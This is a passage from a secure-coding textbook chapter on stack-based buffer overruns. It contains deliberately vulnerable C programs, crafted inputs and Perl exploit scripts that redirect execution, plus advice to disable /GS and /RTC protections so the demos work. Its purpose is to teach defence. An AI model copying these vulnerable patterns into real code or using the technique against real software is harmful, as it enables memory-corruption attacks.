Stack Overruns | Writing Secure Code, Second Edition

Stack Overruns

A stack-based buffer overrun occurs when a buffer declared on the stack is overwritten by copying data larger than the buffer. Variables declared on the stack are located next to the return address for the function's caller. The usual culprit is unchecked user input passed to a function such as strcpy, and the result is that the return address for the function gets overwritten by an address chosen by the attacker. In a normal attack, the attacker can get a program with a buffer overrun to do something he considers useful, such as binding a command shell to the port of their choice. The attacker often has to overcome some interesting problems, such as the fact that the user input isn't completely unchecked or that only a limited number of characters will fit in the buffer. If you're working with double-byte character sets, the hacker might have to work harder, but the problems this introduces aren't insurmountable. If you're the type of programmer who enjoys arcane puzzles the classic definition of a hacker exploiting a buffer overrun can be an interesting exercise. (If you succeed, please keep it between yourself and the software vendor and behave responsibly with your information until the issue is resolved.) This particular intricacy is beyond the scope of this book, so I'll use a program written in C to show a simple exploit of an overrun. Let's take a look at the code:

/* StackOverrun.c This program shows an example of how a stack-based buffer overrun can be used to execute arbitrary code. Its objective is to find an input string that executes the function bar. */ #include <stdio.h> #include <string.h> void foo(const char* input) { char buf[10]; //What? No extra arguments supplied to printf? //It's a cheap trick to view the stack 8-) //We'll see this trick again when we look at format strings. printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n"); //Pass the user input straight to secure code public enemy #1. strcpy(buf, input); printf("%s\n", buf); printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); } void bar(void) { printf("Augh! I've been hacked!\n"); } int main(int argc, char* argv[]) { //Blatant cheating to make life easier on myself printf("Address of foo = %p\n", foo); printf("Address of bar = %p\n", bar); if (argc != 2) { printf("Please supply a string as an argument!\n"); return -1; } foo(argv[1]); return 0; }

This application is nearly as simple as Hello, World. I start off doing a little cheating and printing the addresses of my two functions, foo and bar, by using the printf function's %p option, which displays an address. If I were hacking a real application, I'd probably try to jump back into the static buffer declared in foo or find a useful function loaded from a system dynamic-link library (DLL). The objective of this exercise is to get the bar function to execute. The foo function contains a pair of printf statements that use a side effect of variable-argument functions to print the values on the stack. The real problem occurs when the foo function blindly accepts user input and copies it into a 10-byte buffer.

NOTE
Stack-based buffer overflows are often called static buffer overflows. Although static implies an actual static variable, which is allocated in global memory space, the word is used in this sense to be the opposite of a dynamically allocated buffer that is, a buffer allocated with malloc on the heap. Although static is an overloaded term, it is common to see static buffer overflow used synonymously with stack-based buffer overflow.

The best way to follow along is to compile the application from the command line to produce a release executable. Don't just load it into Microsoft Visual C++ and run it in debug mode the debug version contains checks for stack problems, and it won't demonstrate the problem properly. However, you can load the application into Visual C++ and run it in release mode. Let's take a look at some output after providing a string as the command line argument:

C:\Secureco2\Chapter05>StackOverrun.exe Hello Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A <-- We want to overwrite the return address for foo. 00410EDE Hello Now the stack looks like: 6C6C6548 <-- You can see where "Hello" was copied in. 0000006F 7FFDF000 0012FF80 0040108A 00410EDE

Now for the classic test for buffer overruns we input a long string:

C:\Secureco2\Chapter05> StackOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A 00410ECE AAAAAAAAAAAAAAAAAAAAAAAA Now the stack looks like: 41414141 41414141 41414141 41414141 41414141 41414141

And we get the application error message claiming the instruction at 0x41414141 tried to access memory at address 0x41414141, as shown in Figure 5-1.

figure 5-1 application error message generated after the stack-based buffer overrun occurs.

Figure 5-1. Application error message generated after the stack-based buffer overrun occurs.

Note that if you don't have a development environment on your system, this information will be in the Dr. Watson logs. A quick look at the ASCII charts shows that the code for the letter A is 0x41. This result is proof that our application is exploitable. Warning! Just because you can't figure out a way to get this result does not mean that the overrun isn't exploitable. It means that you haven't worked on it long enough.

Is the Overrun Exploitable?

As we'll demonstrate shortly, there are many, many ways to cause an overflow to be exploitable. Except in a few trivial cases, it generally isn't possible to prove that a buffer overrun isn't exploitable. You can prove only that something is exploitable, so any given buffer overrun either is exploitable or might be exploitable. In other words, if you can't prove that it's exploitable, always assume that an overrun is exploitable. If you tell the public that the buffer overrun in your application isn't exploitable, odds are someone will find a way to prove that it is exploitable just to embarrass you. Or worse, that person might find the exploit and inform only criminals. Now you've misled your users to think the patch to fix the overrun isn't a high priority, and there's an active nonpublic exploit being used to attack your customers.

I'd like to drill down on this point even further. I've seen many developers ask for proof that something is exploitable before they want to fix it. This is the WRONG approach! Just fix the bugs! This desire to determine whether the problem is really bad stems from solid software management practice, which says that for every few things a programmer fixes, they will cause some number of new bugs, depending on the complexity of the fix and the skill of the programmer. This may be true, but let's look at the difference between the consequences of an exploitable buffer overrun and an ordinary bug. The buffer overrun results in a security bulletin, public embarrassment, and if you're writing a popular server, can result in widespread network attacks due to worms. The ordinary bug results in a fix in the next service pack or maintenance release. Thus, we need to weigh the consequences. I'd assert that an exploitable buffer overrun is worse than 100 ordinary bugs.

Also, it could take days of developer time to determine whether something is exploitable. It probably takes less than an hour to fix the problem and get someone to review your changes. Fixes for buffer overflows are usually not risky changes. Even if you determine that you cannot find a way to exploit an overflow, you have little assurance that there truly is no way to exploit it. People also often ask how the vulnerable code could be reached. Determining all the possible code paths into a given function is difficult and is the subject of serious research. Except in trivial cases, you won't be able to rigorously determine whether you have examined all the possible ways to get into your function.

IMPORTANT
Don't fix only those bugs that you think are exploitable. Just fix the bugs!

Let's take a look at how we find which characters to feed the application. Try this:

C:\Secureco2\Chapter05> StackOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A 00410EBE ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 Now the stack looks like: 44434241 48474645 4C4B4A49 504F4E4D 54535251 58575655

The application error message now shows that we're trying to execute instructions at 0x54535251. Glancing again at our ASCII charts, we see that 0x54 is the code for the letter T, so that's what we'd like to modify. Let's now try this:

C:\Secureco2\Chapter05> StacOverrun.exe ABCDEFGHIJKLMNOPQRS Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A 00410ECE ABCDEFGHIJKLMNOPQRS Now the stack looks like: 44434241 48474645 4C4B4A49 504F4E4D 00535251 00410ECE

Now we're getting somewhere! By changing the user input, we're able to manipulate where the program tries to execute the next instruction. We're controlling the program flow with user input! Clearly, if we could send it 0x45, 0x10, 0x40 instead of QRS, we could get bar to execute. So how do you pass these odd characters 0x10 isn't printable on the command line? Like any good hacker, I'll use the following Perl script named HackOverrun.pl to easily send the application an arbitrary command line:

$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40"; $cmd = "StackOverrun ".$arg; system($cmd);

Running this script produces the desired result:

C:\Secureco2\Chapter05>perl HackOverrun .pl Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 77FB80DB 77F94E68 7FFDF000 0012FF80 0040108A 00410ECA ABCDEFGHIJKLMNOPE?@ Now the stack looks like: 44434241 48474645 4C4B4A49 504F4E4D 00401045 00410ECA Augh! I've been hacked!

That was easy, wasn't it? Looks like something even a junior programmer could have done. In a real attack, we'd fill the first 16 characters with assembly code designed to do ghastly things to the victim and set the return address to the start of the buffer. Think about how easy this is to exploit the next time you're working with user input.

Note that if you're using a different compiler or are running a non-U.S. English version of the operating system, these offsets could be different. Several readers of the first edition wrote to point out that the samples didn't quite work because of this. It's one of the reasons I cheated and printed out the address of my two functions. The way to get the examples to work correctly is to follow along using the same technique as demonstrated above but to substitute the actual address of the bar function into your Perl script. Additionally, if you're compiling the application using Visual C++ .NET, the /GS compiler option will be set by default and will prevent this sample from working at all. (But then that's the whole point of the /GS flag!) Either take that flag out of the project settings, or compile from the command line.

Now let's take a look at an example of how an off-by-one error might be exploited. This sounds really difficult, but it turns out not to be hard at all if the conditions are right. Take a look at the following code:

/* OffByOne.c */ #include <stdio.h> #include <string.h> void foo(const char* in) { char buf[64]; strncpy(buf, in, sizeof(buf)); buf[sizeof(buf)] = '\0'; //whups - off by one! printf("%s\n", buf); } void bar(const char* in) { printf("Augh! I've been hacked!\n"); } int main(int argc, char* argv[]) { if(argc != 2) { printf("Usage is %s [string]\n", argv[0]); return -1; } printf("Address of foo is %p, address of bar is %p\n", foo, bar); foo(argv[1]); return 0; }

Our poor programmer gave this one a good shot he used strncpy to copy the buffer, and sizeof was used to determine the size of the buffer. The only mistake is that the buffer overwrote just one more byte than it should have. The best way to follow along is to compile a release version with debugging information. Go into your project settings and under the C/C++ settings, set Debug Info to the same as your debug build would have and disable optimizations, which conflicts with having debug information. If you're running Visual Studio .NET, turn off the /GS option and the /RTC option or this demo won't work. Next, go into the Link options and enable Debug Info there, too. Put a bunch of A's into your program arguments, set a breakpoint on the foo call and let's take a look.

First, open your Registers window, and note the value of EBP this is going to turn out to be very important. Now go ahead and step into foo. Pull up a Memory window, and find the location of buf. The strncpy call will fill buf with A's, and the next value below buf is your saved EBP pointer. Now step into the next line to terminate buf with a null character, and note how the saved EBP pointer has changed from 0x0012FF80 to 0x0012FF00 (on my system using Visual C++ 6.0 yours might be different). Next consider that you control what is stored at 0x0012FF00 it is currently filled with 0x41414141! Now step over the printf call, right-click on the program, and switch to disassembly mode. Open the registers window, and watch carefully to see what happens. Just prior to the ret instruction, we see pop ebp. Now notice that the EBP register has our corrupted value. We now return into the main function, where we start to exit, and the last instruction we execute before returning from main is mov esp,ebp we're just going to take the contents of the EBP register and store them in ESP which is our stack pointer! Notice that once we step over the final ret call, we land right at 0x41414141. We've clearly seized control of the execution flow by using just one byte!

To make it exploitable, we can use the same technique as for a simple stack-based buffer overflow. We'll tinker with it until we get the execution errors to move around. Like the first one, a Perl script was the easiest way to make it work. Here's mine:

$arg = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"."\x40\x10\x40"; $cmd = "off_by_one ".$arg; system($cmd);

And here's the output:

Address of foo is 00401000, address of bar is 00401040 AAAAAAAAAAAAAAAAAAAAAAAAAAAA@?@ Augh! I've been hacked!

There are a couple of conditions that need to be met for this to be exploited. First, the number of bytes in the buffer needs to be divisible by 4 or the single-byte overrun won't change the saved EBP. Next, we need to have control of the area that EBP now points to, so if the last byte of EBP were 0xF0 and our buffer were less than 240 bytes, we wouldn't be able to directly change the value that eventually gets moved into ESP. Nevertheless, a number of one-byte overruns have turned out to be exploitable in the real world. Two of the most well known are the Apache mod_ssl off-by-one vulnerability and the wuftpd glob. You can read about these at http://online.securityfocus.com/archive/1/279074 and ftp://ftp.wu-ftpd.org/pub/wu-ftpd-attic/cert.org/CA-2001-33, respectively.

NOTE
The 64-bit Intel Itanium does not push the return address on the stack; rather, the return address is held in a register. This does not mean the processor is not susceptible to buffer overruns. It's just more difficult to make the overrun exploitable.